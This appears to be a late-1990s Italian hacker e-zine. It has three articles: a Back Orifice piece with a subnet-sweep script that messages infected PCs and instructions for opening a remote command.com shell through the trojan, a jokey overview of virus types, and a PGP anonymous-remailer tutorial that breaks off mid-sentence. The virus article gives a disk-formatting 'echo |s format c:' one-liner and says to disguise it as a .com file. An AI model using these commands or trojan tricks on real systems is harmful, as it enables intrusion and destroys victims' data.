_/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_/~~~~\__/~~~~~~\__/~~\__/~~\_/~~~~~~~~\_ /~~\_______/~~\____________/~~\___/~~\__/~~\__/~~\_/~~~~\/~~\_/~~\_______ _/~~~~~~\__/~~~~~~\______/~~\_____/~~\__/~~\__/~~\_/~~~~~~~~\_/~~~~~~\___ ______/~~\_/~~\________/~~\_______/~~\__/~~\__/~~\_/~~\/~~~~\_/~~\_______ _/~~~~~~\__/~~~~~~~~\_/~~~~~~~~\_/~~~~\__/~~~~~~\__/~~\__/~~\_/~~~~~~~~\_ _________________________________________________________________________ _____________________________________BoBo & LaNdo______ /~~\________/~~~~~~\__/~~\__/~~\__/~~~~~~\__/~~\__/~~\_ /~~\_______/~~\__/~~\_/~~~\/~~~\_/~~\__/~~\_/~~\__/~~\_ /~~\_______/~~~~~~~~\_/~~~~~~~~\_/~~~~~~~~\_/~~~~~~~~\_ /~~\_______/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_ /~~~~~~~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_/~~\__/~~\_ _______________________________________________________ COME VALANGARE DI PING UN IP (SULLA PORTA DI BO) CON LA LEGGE DALLA NOSTRA PARTE: by Mr.Lamah Ehehehehehe lo sapevate che il ping di BO non configurato come sabotaggio informatico, violazione della privacy e roba del genere? Infatti la legge del 23 dicembre 1993 n. 547 definisce i "reati informatici", ma il semplice PING del Back Orifice non e', in se', reato (non configura ne' la fattispecie di "alterazione di funzionamento", ne' quella di "violenza sulle cose" in senso lato). L'unica apparenza di punibilita' percio' (nel caso di un PING) deriva da come tale PING e' stato inviato, i.e. usando un client Back Orifice? Nel caso, il pingatore e' in possesso di uno strumento "atto a...", e quindi (in teoria!) si configura la fattispecie di possesso di strumento idoneo a introdursi in un sistema telematico od informatico (art. 615 quater). Per esempio il seguente script ... for i in $ICMP_FOUND_HOSTS; do if ( bo_ping $i 31337 "" ); then cat <<-HERE | bo_send $i 31337 "" 9 Non dovrei essere qui. Lei ha installato BACK ORIFICE sul suo PC. Per rimuoverlo, consulti SUBITO http://attilahack.cjb.net --- Finche' non lo fara', sara' possibile a me o ad altri ENTRARE NEL SUO PC! HERE fi done ... questo genera una marea di PING su una sottorete, ma, noi abbiamo solo avvertito al boservizzato che possibile entrare nel suo pc quindi vai a dimostrare la mia mala fede. Completamente diverso e' invece il discorso, per chi si spinge al di la' del semplice "ping". Ma questa un'altra storia... Ciao a tutti e un sentito ringraziamento a tutto il team di Attila_Hack. HAPPY LAMING by Mr. Lamah (Attila_Hack MemberZ) +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- INTERAGIRE CON BO TRAMITE TELNET: by Mr.Lamah Per quanto riguarda interagire in una sessione telnet con BO, telnet si pu aprire dal client Bo con il comando App Add, si deve scrivere nella finestra exe.location Command.com e scegliere una porta a piacere come listen port. Poi si fa telnet all'indirizzo ip target sulla porta appena scelta... E' una vera e propria shell. Per quanto riguarda invece il comunicare col server del BO tramite telnet, cioe' collegarsi alla sua 31337 (o qualunque altra porta abbia configurato) con telnet, non si puo' fare. Il motivo e' che BO usa UDP, mentre telnet usa TCP. HAPPY LAMING by Mr. Lamah (Attila_Hack MemberZ) +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ___ ___ ___ ___ ___ ___ ___ /\ \ /\ \ /\ \ /\ \ /\ \ /\__\ /\ \ /::\ \ /::\ \ _\:\ \ _\:\ \ /::\ \ /:| _|_ /::\ \ /\:\:\__\ /::\:\__\ /::::\__\ /\/::\__\ /:/\:\__\ /::|/\__\ /::\:\__\ \:\:\/__/ \:\:\/ / \::;;/__/ \::/\/__/ \:\/:/ / \/|::/ / \:\:\/ / \::/ / \:\/ / \:\__\ \:\__\ \::/ / |:/ / \:\/ / \/__/ \/__/ \/__/ \/__/ \/__/ \/__/ \/__/ ___ ___ ___ ___ ___ BoBo & LaNdo ___ /\__\ /\ \ /\ \ /\ \ /\ \ /\__\ /\ \ /:/ _/_ _\:\ \ /::\ \ _\:\ \ _\:\ \ /:| _|_ /::\ \ |::L/\__\ /\/::\__\ /::\:\__\ /\/::\__\ /\/::\__\ /::|/\__\ /:/\:\__\ |::::/ / \::/\/__/ \;:::/ / \::/\/__/ \::/\/__/ \/|::/ / \:\:\/__/ L;;/__/ \:\__\ |:\/__/ \:\__\ \:\__\ |:/ / \::/ / \/__/ \|__| \/__/ \/__/ \/__/ \/__/ ******************************* * * * VIRING CHE PASSIONE!! * * * * by Ritz * * * * Collaboration by Quequero * * * ******************************* &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& DESCLAIMER (anche se non servirebbe fa sempre comodo...): Programmare virus per uso DIDATTICO e PERSONALE non illegale, ma lo distribuire i propri virus per danneggiare altri sistemi. L'autore, Ritz, non ha mai n prodotto n distribuito virus, appunto, e non avvalla alcun uso illegale del presente articolo: esso stato scritto a PURO scopo DIDATTICO. Se il lettore si ritiene offeso dai suoi contenuti pregato di interromperne immediatamente la lettura. Inoltre, lo stesso autore non si ritiene responsabile se distruggete il computer VOSTRO o di qualcun altro dopo aver letto questo articolo. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Ciao a tutti!! Come avrete gi letto nell'intestazione e nel DESCLAIMER io mi chiamo Ritz, e ho deciso di fare questo articolo perch gli altri argomenti della rivista erano gi tutti occupati... :-) suvvia, scherzavo, l'ho scritto semplicemente perch avevo voglia di provare a scrivere per una e-zine rendendomi (spero) utile. Sappiate che questo la mia prima pubblicazione per una rivista (e probabilmente dopo che BoBo la legger sar anche l'ultima ;-) ), quindi non lapidatemi se secondo voi sono stato troppo poco chiaro (cmq non penso :)). Thanks & greets 2:-Tutto lo staff di softpj e BFI, siete mitiiiiiciii! -Tutto lo staff dei Ringzer0, e in particolare +MaLaTTia, con me molto gentile in IRC, spero di diventare come voi!! -Quequero: il suo sito stato anche il primo da me Teleportato! (Chiss perch! ;-) ). Egli inoltre mi ha aiutato nella stesura di questo articolo consigliandomi dei cambiamenti in alcuni punti. Grazie QUE! SEI MITIIIICOOOO!! -Due amici di IRC compagni di classe (DFX e il Mora). -WhiteFly, anche lui molto disponibile su IRC. Ciaoooo!!! -xOANINO, sicuramente uno dei migliori crackers italiani dopo i Ritz (che battuta idiota... perdonami xOA non volevo offenderti :) ) e probabilmente del mondo! SEI UN GEEENIOOOOOOO!!! -Altri vari amici di IRC in ordine sparso ([aLT255], ^courier, moonshadow, ecc.]. -Tutti gli Attila_Hack members e in particolare BoBo. -Tutti quelli che so che dovevo ringaziare fino a 5 minuti fa ma che ora non mi ricordo pi- chi sono (frase lineare e coerente!). Fuck to : -Un' azienda italiana (di cui non faccio il nome, IHIHIHIH) che si okkupa di telefonia fissa. -Al pi- ricco Bill del pianeta: per te non posso dire altro che: VAMMORIAMMAZZATO (Anche se non sono de Roomaaa). Dopo 20 minuti buoni per arrivare a scrivere fin qui (suvvia, il mio 1 articolo dopotutto) voi starete gi dicendo: CHE PALLE! giusto? Bene, allora iniziamo! In queste righe vorrei introdurvi al concetto di virus e spiegare i vari tipi che esistono [se state leggendo sperando alla fine di poter mandare in casino un picc, beh avete sbagliato articolo (o quasi?)]. Dunque dunque... Secondo il va/occabolario, un virus (informatico, si intende) un "Programma, creato a scopi di sabotaggio o vandalismo, che si trasmette tramite floppy disk o reti telematiche e danneggia o blocca il funzionamento di un computer o ne distrugge i dati memorizzati", e fin qui spero che sapeste gi tutto, altimenti... ora lo sapete :-) Ma come viene scritto un viruz? Beh, un viruz si pu scrivere in vari linguaggi (Pascal, C, Visual Basic (con quest'ultimo cmq intendo i macro virus) ), ma il modo pi- efficace per aver tutto il computer sotto il proprio controllo sicuramente l'Assembly: la stragrande maggioranza di viruz (se si escludono i macro virus) sono scritti proprio a basso livello. Naturalmente, essi possono essere scritti anche con linguaggi al alto livello (basti pensare che per formattare un disco basta un file BAT creato con l'EDIT del DOS: "echo |s format c:"), ma questi sono meno "liberi", in quanto non hanno il pieno potere su ogni singolo bit della macchina. Ma vediamo ora le categorie in cui essi si suddividono: WORMS TROJANS VIRUZ WORMS Ossia vermi, in pratica sono dei virus che si riproducono da PC a PC attraverso la rete. Il pi- celebre esempio quello di Robert Morris, che ne cre uno (anni '80) il quale infetto moltissimi computer molto rapidamente grazie un bug indovinate un po' di che: SENDMAIL... strano eh? TROJANS E qui arriva il bello: i "Cavalli di Troia"! Non sto a spiegarvi la leggenda dei greci, l'avrete sentita 6372 volte e ne avrete due ***** cos, quindi niente epica per oggi. I trojan sfruttano proprio lo stesso processo: essi sono proggies tipo BO o NETBUS (W il laming!) che possono darti il controllo completo di un PC, ma sono anche viruz pi- semplici: ad esempio, create con il Blokko Note un file avente come unica riga di testo "echo |s format c:" (SENZA VIRGOLETTE), chiamatelo xyz.bat, procuratevi l'utility BAT2COM (la trovate sul sito di Quequero, OBBLIGATORIO VISITARLO), usatela per convertire xyz.bat in xyz.com, NON eseguitelo e... provatelo se dovete reinstallare Winkaz perch si inkiodato perennemente (W Bill): immaginate un po' cosa si pu fare solo con Blokko Note. Il motto quindi : SPAZIO ALLA FANTASIA. VIRUZ Ahia, qui si va sul complicato: essi sono i veri e propri viruz scritti specialmente in Assembly, e il loro scopo quello di riprodursi il pi- possibile. Ah ecco, a proposito riporto qui di seguito una storiella trovata su Internet (c' anche sul sito di Quequero, giuro non l'ho copiata). MA WINDOUZ E' UN VIRUZ? Dunque, la questione molto aperta, analizziamola in dettaglio: 1- I virus possono distruggere un computer e cancellare accidentalmente dati. WINDOUZ E' UN VIRUS. 2- I virus ri replicano velocemente. WINDOUZ E' UN VIRUS. 3- I virus rallenatano i sistema al punto che ti vien voglia di spaccare il monitor a calci. WINDOUZ E' UN VIRUS. 4- I virus infettano i programmi principali. WINDOUZ E' UN VIRUS. Per c' da dire altro: i virus sono compatti, veloci, efficienti, funzionano in qualunque PC, sono GIOIELLINI dell'Assembly, si migliorano col passare del tempo: allora ecco scpiegato perch WINDOUZ non un virus (convinti?). COME VOLEVASI DIMOSTRARE Tornando a noi, ecco i principali tipi di viruz: MACRO VIRUS Sono dei virus scritti in Visual Basic, rappresentano circa l'80% della categoria, possono infettare il PC se il file Word, Excel, ecc. viene aperto attivando la macro, altrimenti non vengono attivati, appunto. Gli effetti possono essere i pi- svariati, e non riguardano solo l'applicazione o il file che supportano la macro, ma anche tutto il sistema. FILE VIRUS Infettano i file EXE, COM, DLL, DRV, VXD copiandoci il proprio codice di infezione quando un altro programma infettato viene aperto. Possono essere residendi (se rimangono nel codice del programma vittima dopo la sua chiusura) o non residenti (se non ci rimangono). VIRUS POLIMORFICI Sono virus molto difficili da individuare in quanto cambiano il loro codice virale ogni volta che infettano un file. Una volta mi ricordo mi capitato uno di questi virus: ci ho messo 2 giorni per pulire tutto e dopo una settimana mi ricomparso! BOOT VIRUS Ops li stavo dimenticando: semplice, sono virus che infettano i settori di boot di un disco fisso o floppy impedendo, appunto, il boot da essi. Sono comunque facilmente eliminabili, ad esempio spesso se Winkaz infettato basta farlo ripartire da un floppy sano e ripristinare tutto con un antivirus... per il resto non fanno null'altro. A volte (ma non sempre) pu persino bastare fare il boot da floppy e con il comando "sys a: c:" oppure "fdisk /mbr" (il comando ripulisce il Master Boot Record: NON utilizzatelo se avete un Boot Loader installato, ad esempio LILO) per mettere tutto a posto. VIRUS MULTIPARTITI Questi sono simili ai BOOT VIRUS, per una volta che c' il boot vengono eseguiti; infettano anche altri file di sistema. Non male. STEALTH Vengono chiamati cos perch sono nascosti e possono interagire con moltissime funzioni del S.O. prendendone il controllo e cambiando un po' di robette, precisamente hookando varie funzioni e manipolandole. COMPANION Molto carini, in pratica si insediano in una o pi- cartelle, creando file COM con lo stesso nome dei file EXE nascondendo questi ultimi. Naturalmente, Windouz eseguir i COM dando loro la precedenza sugli EXE. Immaginate un po' le conseguenze possibili... VIRUS IN THE WILD ne ho sentito parlare molto poco, sono virus scappati dai laboratori di ricerca (?!#@&%$) e potenzialmente molto distruttivi. Non so altro su di essi a parte che in libera circolazione ce ne sono circa 300. Oltre a tutti questi ce ne sarebbero altri, es. gli Armored, i Clean On The Fly (si cancellano dal file vittima quando questo viene letto), gli MBR stealth, ecc..., ma questi sono meno diffusi e poi per oggi penso che basti cos. Se volete saperne di pi- cercate su Altavista o... chiedetemeli... :))) (scherzo eh?) Bene, penso di aver finito... ho cercato di essere abbastanda rapido ma chiaro (spesso questi articoli skazzano il lettore :-( ). Per qualunque domanda, insulto, ringraziamento, ecc.... scrivetemi pure all'indirizzo sotto. Ringrazio tutti coloro che sono arrivati fin qui nella lettura e colgo nuovamente l'occasione per ringraziare Quequero per i suoi suggerimenti. CIAO A TUTTI! **************************************************** * * * Ritz * * Eclyps3@excite.com * * - The way is made clear when viewed from above - * * On ICQ: 41793377 * * On IRC: Ritz * * * **************************************************** +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ________ ________ BoBo & LaNdo _____ ____ _/_________ __/_____ ___ _______ __________(_)____ __ / __ __ \_ /_ _ __ \ __ | / / __ `/_ ___/_ /_ _ \ __/ / _ / / / __/ / /_/ / __ |/ // /_/ /_ / _ / / __/ /___/ /_/ /_//_/ \____/ _____/ \__,_/ /_/ /_/ \___/ COSA SONO E COME SI USANO GLI ANONYMOUS REMAILER: by Quequero La vera ricchezza non si misura con i soldi che possediamo, ma con la cultura che ci portiamo dietro. Quequero Stavolta non cracker ne reverser un bel niente ma tratteremo un argomento lo stesso interessante cio l'utilizzo degli Anonymous Remailer....Perch la UIC non solo Reversing :) Home page: http://quequero.cjb.net E-mail: UIC@mail.usa.com chan: #crack-it, UIN: 41703512 Difficolt: Newbies-Intermedio Introduzione: Pi passa il tempo e pi l'anonimit diventa una cosa di fatto, sempre pi spesso abbiamo bisogno di restare anonimi e cercare di far sapere a meno gente possibile informazioni su di noi, bh dal momento che uno dei modi pi semplici per essere beccati l'e-mail allora iniziamo ad anonimizzarla. Tools usati: Il pgp anche se opzionale (www.pgpi.com) un cervello, una mano ed un occh Essay Come vi accennavo stavolta parleremo degli anonymous remailer, ma prima diamo uno sguardo alle lettere che ci arrivano e cerchiamo di capire perch poco sicuro spedire lettere a destra e a manca senza opportune precauzioni. Supponiamo di mandare una mail anonima ma come tutti dovreste sapere le mail mantengono un header nel quale c' scritto praticamente tutto, ecco un esempio reale di header: Mittente: mittente@tin.it Ricevente: ricevente@tin.it Return-Path: ;Path di ritorno della mail Received: from utente ;Ricevuto da utente (utente l'id usato per la connessione alla) ([212.216.180.212]) ;IP del mandante (questo importante) by fep12-svc.tin.it ;Host del mittente (InterMail v4.0 201-221-105) with ESMTP ;Versione del programma usato dal server per mandare la posta id <19990604173132.XESA3606.fep12-svc@utente> ;Anno-Mese-Giorno-Ore-Minuti-Secondi.alcunidati. ID_host@UserID for ; ;Indirizzo del destinatario Fri, 4 Jun 1999 17:31:32 +0200 ;Ora e data all'atto della ricezione della mail e il codice fiscale? :) From: "Mittente della Lettera" ;Nome e indirizzo del mittente To: "Ricevente della lettera" ;Nome e indirizzo del ricevente Subject: Soggetto del messaggio ;Soggetto del messaggio Date: Fri, 4 Jun 1999 17:28:01 +0200;Ora e data all'atto della trasmissione X-MSMail-Priority: Normal ;Priorit della mail X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Message-Id: <19990604173132.XESA3606.fep12-svc@utente> ;Anno-Mese-Giorno-Ore-Minuti-Secondi. alcunidati. ID_host@UserID Ci manca qualcosa? Credo niente, giusto giusto ci potevano mettere il numero di carta di credito heheheh :) come vedete una normale mail ......Come dire......Poco anonima, abbiamo davvero tutti i dati che ci servono per rintracciare il mittente, eccovi adesso un header di una mail speditami al mio mail-forward cio UIC@mail.usa.com , il viaggio in pratica stato: client del mittente-server del mail_forward-mio server: Return-Path: Received: from smv03.iname.net ;Mail proveniente dal server smv03.iname.net ([165.251.8.81]) by fep02-svc.tin.it ;IP del server iname e host del server che ha ricevuto la lettera (InterMail v4.0 201-221-105) with SMTP ;Versione del programm usato dal server e specifica che stato usato un serve di posta in uscita SMTP id <19990707222017.BWVK28793.fep02-svc@smv03.iname.net>;Anno, mese..... insomma l'avete capito e host del server iname che ha ricevuto la mail for ; Thu, 8 Jul 1999 00:20:17 +0200;Indirizzo del destinatario + giorno anno ecc..... Return-Path: ;Specifica il path di ritorno Received: from fep03-svc.tin.it (mta03-acc.tin.it [212.216.143.14]);Host e IP del server TIN che ha ricevuto la lettera by smv03.iname.net (8.9.3/8.9.1SMV2) with ESMTP id SAA12765;Lettera ricevuta dal server smv.iname.net e l'ID for sent by ; Wed, 7 Jul 1999 18:20:14 -0400 (EDT); Mail per UIC@mail.usa.com spedita da Mittente@in.it nella tal data ora anno e minuto.... Received: from oemcomputer ([212.216.140.150]) by fep03-svc.tin.it (InterMail v4.0 201-221-105) with SMTP;Ricevuta da un oemcomputer+IP dal server fep03-svc... Che ha usato tale programma e un server SMTP id <19990707221943.NUHX20919.fep03-svc@oemcomputer>;Qui la mail viene rispedita verso di me for ; Thu, 8 Jul 1999 00:19:43 +0200 Message-ID: <000801bec8c6$b1e669e0$fabed8d4@oemcomputer> From: "Mittente" To: "Quequero" Subject: Mi serve una mano!!! Date: Thu, 8 Jul 1999 00:18:45 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01BEC8D7.71788440" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2014.211 ;Programma usato dal mittente per mandare la lettera X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2014.211 This is a multi-part message in MIME format. ------=_NextPart_000_0005_01BEC8D7.71788440 Content-Type: text/plain; charset="iso-8859-1" Non preoccupatevi se siete confusi perch vi rispiego un po' meglio com' andata la storia: Mittente ha scritto una mail con Microsoft Outlook Express 5.00.2014.211 e l'ha inviata a UIC@mail.usa.com , la lettera inizialmente entrata nel server fep02-svc.tin.it che a sua volta l'ha rinviata a smv03.iname.net che l'ha poi rispedita secondo un ID che aveva in memoria a fep03-svc.tin.it dal quale l'ho poi ricevuta io, semplice no? ;) Ok nonostante il mail-forward se qualcuno mi tenesse sott'occhio portebbe innanzitutto leggere la mia posta in uscita, oppure potrebbe con un po di lavoro risalire dall'id che ho suul server smv03.iname.net al mio vero indirizzo, il problema che comunque non posso rispedire la mia mail da casa (altrimenti il ricevente vedrebbe il mio indirizzo) e mi dovrei avvalere di un servizio di posta anonima come freemail, yahoo ecc..... Ok l'altra soluzione sarebbe quella di usare un servizio di posta anonima sia per la posta in entrata che in uscita ma come tutti sapete non granch comodo (e poi questi servizi sono come ICQ, conoscono sempre il vostro IP e potete per questo essere facilmente tracciati), ci possiamo quindi avvalere ad un comodissimo mail-forward per la posta in entrata e ad un remailer per quella in uscita giusto? Credo sia la combinazione migliore. Andiamo quindi a vedere dopo questo lungo preambolo cosa sono questi i famigerati remailer. Un remailer non altro che un server che serve a ricevere una mail ed a rimandarla all'apposito destinatario, l'ulteriore vantaggio che i remailer oltre che offrire anonimato ci regalano anche sicurezza dal momento che usandoli in un certo modo possiamo mantenere un anonimato totale, i remailer si dividono in 3 tipi, Pseudo-Anonymous, CypherPunk e MixMaster, iniziamo a descriverne i vari tipi. Pseudo-Anonymous Questi remailer (detti anche di tipo 0) sono ormai antiquati e non danno un grande anonimato, il loro modo di agire questo: in pratica ogni volta che mandate ad uno di questi remailer (per esempio: anon@anon.penet.fi) loro vi forniscono un ID casuale e strippano le informazioni nell'header sostituendole con questo ID, il destinatario per rispondervi non dovr fare altro che usare il famoso reply-to per rispondervi, il server allora riconoscer quell'ID e vi rimander la mail, il problema che gli operatori ed il server stesso conoscono il vostro vero indirizzo e quindi potrebbero essere corrotti a diffondere degli indirizzi, o peggio un hacker potrebbe trovare tutti i vostri dati oppure come successe per anon.penet.fi il padrone del serve potrebbe essere costretto a dover rivelare il proprio archivio per consegnare prove algli agenti di stato eccetera, vi consiglio di usare questo tipo di remailer solo se non avete bisogno di un livello estremamente alto di anonimit, certo che se siete hacker, reverser o comunque fate cose illegali allora gli Pseudo-Anonymous non sono indicati infatti mantengono i log, non permettono di concatenare vari remailer tra loro e neanche accettano mail crittate, l'operatore potrebbe quindi leggersi come e quando vuole la vostra mail. CypherPunk I remailer CypherPunk (detti di Tipo 1) sono estremamente pi sicuri dei precedenti per il semplice fatto che ci offrono svariate chicche che possono farci sempre comodo e queste sono: 1) Accettano la posta crittata 2) Ci consentono di creare un latency time prima del rinvio 3) Abbiamo la possibilit di concatenare pi remailer tra loro 4) Utilizzano un riordinamento casuale dei messaggi Dunque i pi esperti sostengono che per ottenere livelli di sicurezza praticamente assoluti si devono concatenare almeno tre remailer, prima di tutto dobbiamo trovare un remailer e per questo dovete visitare il sito: http://anon.efga.org/~rlist/rlist.html dovete farlo perch i remailer dal momento che non producono entrate vanno e vengono, possono durare anni oppure restare on-line un solo mese o meno, ok appena avrete il remailer aprite il vostro client di posta e mettete come indirizzo quello del remailer ad esempio: remailer@flame.alias.net poi come soggetto quello che volete ed infine potete scrivere la lettera ma con un criterio standard ossia, prima di mandare il messaggio dovete inserire una riga contenete solo una coppia di due punti (::) poi lasciare una riga, scrivere una riga con: Request-Remailing-To: destinatario, di nuovo una riga bianca e poi la lettera, ecco come: A: remailer@flame.alias.net Soggetto: quello che pi ti garba ---------------------------------------- :: Request-Remailing-To: destinatario@tin.it Ciao, questa una stupida prova per imparare ad usare un remailer ------------------------------------------------------------------------ Ok adesso non vi resta che inviare la mail ed aspettare che arrivi, nonostante tutto il vostro anonimato non coperto totalmente quindi non potete minacciare Clinton :), quindi la lettera arriver al remailer che a sua volta lo rimander a Destinatario@tin.it, ok adesso per coprire un po' di pi il vostro messaggio potete crittarlo col PGP, per prima cosa dovete ottenere la chiave pubblica del vostro remailer, per farlo mandate una mail vuota con soggetto: remailer-help al vostro remailer e dopo pochi secondi avrete finalmente tutte le info sul remailer e la sua chiave pubblica, prendete il messaggio: :: Request-Remailing-To: Destinatario@tin.it Ciao, questa una stupida prova per imparare ad usare un remailer. crittatelo usando l'opzione Text Output se avete PGP 6 o superiore: -----BEGIN PGP MESSAGE----- Version: PGPfreeware 6.0.2i hQCMA98tceHEP7bpAQP/aIgwnTmh73X0M1KTMRXLtOeG8qCm1ejQwBTXnJ7NJrS3 qsY4GZTyHmy86U17XRay1nM2GC6eCv81EuZsejQolG4P7kxTX1Ywl2PuPceZPQ3m JkEbhcNNXIgXqWkc1p/ahb9AnJ08hdi9J+FBcjiI5wUDffaOOSNkOuUoKPhjKTyk kybbDH8B9GWNd0ruHxQDESWqFDlI2c3naYyxyErH8Kww3NbPjCYcZ07UfxE7LEr9 /gU2hPvOYpj49h6Nm3rRVlS9Kqve9Yr5D6PNxbsP1ege4CMO7uJXG0+r+PdEhZ1R 3CbQOlDANpsmhFVzbxN3bHB/CLFzVg16QrFceYPsO4OZpENAU0Eb3tYv1LRlGn2U lIhzdQ== =D7/d -----END PGP MESSAGE----- Ok adesso avete crittato con la chiave pubblica del server, adesso per dovete spedire la mail e come fate? Aprite un nuovo messaggio a fate cos: :: Request-Remailing-To: destinatario@tin.it :: Encrypted: PGP -----BEGIN PGP MESSAGE----- Version: PGPfreeware 6.0.2i hQCMA98tceHEP7bpAQP/aIgwnTmh73X0M1KTMRXLtOeG8qCm1ejQwBTXnJ7NJrS3 qsY4GZTyHmy86U17XRay1nM2GC6eCv81EuZsejQolG4P7kxTX1Ywl2PuPceZPQ3m JkEbhcNNXIgXqWkc1p/ahb9AnJ08hdi9J+FBcjiI5wUDffaOOSNkOuUoKPhjKTyk kybbDH8B9GWNd0ruHxQDESWqFDlI2c3naYyxyErH8Kww3NbPjCYcZ07UfxE7LEr9 /gU2hPvOYpj49h6Nm3rRVlS9Kqve9Yr5D6PNxbsP1ege4CMO7uJXG0+r+PdEhZ1R 3CbQOlDANpsmhFVzbxN3bHB/CLFzVg16QrFceYPsO4OZpENAU0Eb3tYv1LRlGn2U lIhzdQ== =D7/d -----END PGP MESSAGE----- e la spedite, non dovete fa altro in pratica che aggiungere un'altra volta i due punti e poi la stringa Encrypted:PGP che serve a dire al remailer che gli state mandando un messaggio crittato (ovviamente dovete mettere nel campo "A:" l'indirizzo del vostro remailer), vi starete chiedendo come fa il server a rimandare la lettera se non pu leggere il messaggio, ma ovvio, siccome abbimao crittato il testo con la sua chiave pubblica lui non fa altro che decrittare il tutto e leggerlo con comodo :) Il vostro anonimato a questo punto gi pi coperto ma neanche troppo dal momento che il vostro remailer conosce sia il mittente che il destinatario e quindi un eventuale controllo potrebbe smascherarvi, per ovviare a questo problema potete concatenare due o pi remailer, farlo estremamente facile ed ora ve ne mostrer il modo: si riempiono i consueti campi "A:" "Subject:" ecc...Poi nel corpo della lettera si inseriscono tanti "Request-Remailing-To:" quanti sono i remailer che volete usare e poi come all'ultimo "Request-Remailing-To:" inserite il vostro destinatario, ecco il solito esempio: A: remailer@flame.alias.net Soggetto: Prova di concatenazione remailer ----------------------------------------------------- :: Request-Remailing-To: remailer@base.xs4all.nl :: Request-Remailing-To: blackbird@cpis.net :: Request-Remailing-To: bluebox@phreaker.net :: Request-Remailing-To: cannabis.anon@hotpop.com :: Request-Remailing-To: destinatario@tin.it Ciao, questa una stupida prova per imparare ad usare una catena di remailer. A questo punto dovreste aver capito che il primo remailer (remailer@flame.alias.net) prende la mail le cambia l'header e la rispedisce al secondo che cambia l'header e rinvia il tutto al terzo e cos via fino al destinatario che cos sapr solo che la lettera proviene dall'ultimo remailer, quindi da questo punto di vista l'anonimit assicurata, protetta anche da eventuali supervisori perch ad ogni modo non potrebbero rintracciarla infatti il primo remailer conosce il mandante e l'indirizzo del secondo remailer ma non il destinatario effettivo, il secondo remailer non conosce n il mittente n il destinatario effettivo, il terzo e cos via, poi l'ultimo remailer conosce solo il destinatario ma non sa un ciufolo del mittente quindi non ci sono problemi...Se se, vi credete voi, i problemi ci sono e come infatti la mail non crittata quindi qualunque coglione potrebbe leggerla :), ok avrete capito che adesso parleremo di remailer concatenati e mail crittate...Hehehehehe GnGnGnGnGnGnGnGn (leggasi come una sghignazzata con la gn di gnomo :). Adesso proviamo a crittare una mail, prima di tutto vi devo dire il meccanismo: scaricate la chiave di ogni singolo remailer, scrivete il messaggio comprensivo dei due punti e della stringa "Encrypted:PGP" e con tutto il testo PGPiatelo con la chiave dell'ULTIMO remailer: lettera originale: :: Request-Remailing-To: destinatario@tin.it Ciao, questa una stupida prova per imparare ad usare una catena di remailer. PGPiatela con la chiave di cannabis.anon@hotpop.com e l'opzione Text Output per versione 6 o superiori del PGP, insomma se c'avete quell'opzione attivatela: -----BEGIN PGP MESSAGE----- Version: PGPfreeware 6.0.2i hQCJAz0VsrLnrsHlAQPopF2nZixPMShNo/+6e4KlYKB0/XO+LiSTXVa2cg8tRU8o dKkQNWf+yM3EAnnW3q9vyorxN0z1SQEvMHW8V+j81jP9MvXvAhg/uL7r89PIbyk/ lxxSp8s+ATIRJKJDsBv9DJN653pX4pdKuQJ2OpwEt4tlr69+yskSxH2IwdGkil6H lqDvo+hvAidV61TAeGK9RfiuP0HSQI6MfRl7qbsRyfQ5Hjj9VA0/MX8eKRH65gWv W03FNzwcSs9byfaeiL5K4AyBS1vzQ/0167uw5xl7eFcHPTDN+q2lCtFL+kxz0keN +46/aa6q0ZIK3Q6LSIG9NfbDU3t09BcUJfSa7RIvHHI0WdlwVNQs+g== =acxg -----END PGP MESSAGE----- OKi, aggiungete le solite stringhe e rimettete il testo: :: Request-Remailing-To: bluebox@phreaker.net :: Encrypted:PGP -----BEGIN PGP MESSAGE----- Version: PGPfreeware 6.0.2i hQCJAz0VsrLnrsHlAQPopF2nZixPMShNo/+6e4KlYKB0/XO+LiSTXVa2cg8tRU8o dKkQNWf+yM3EAnnW3q9vyorxN0z1SQEvMHW8V+j81jP9MvXvAhg/uL7r89PIbyk/ lxxSp8s+ATIRJKJDsBv9DJN653pX4pdKuQJ2OpwEt4tlr69+yskSxH2IwdGkil6H lqDvo+hvAidV61TAeGK9RfiuP0HSQI6MfRl7qbsRyfQ5Hjj9VA0/MX8eKRH65gWv W03FNzwcSs9byfaeiL5K4AyBS1vzQ/0167uw5xl7eFcHPTDN+q2lCtFL+kxz0keN +46/aa6q0ZIK3Q6LSIG9NfbDU3t09BcUJfSa7RIvHHI0WdlwVNQs+g== =acxg -----END PGP MESSAGE----- A questo punto crittate il tutto con la chiave del 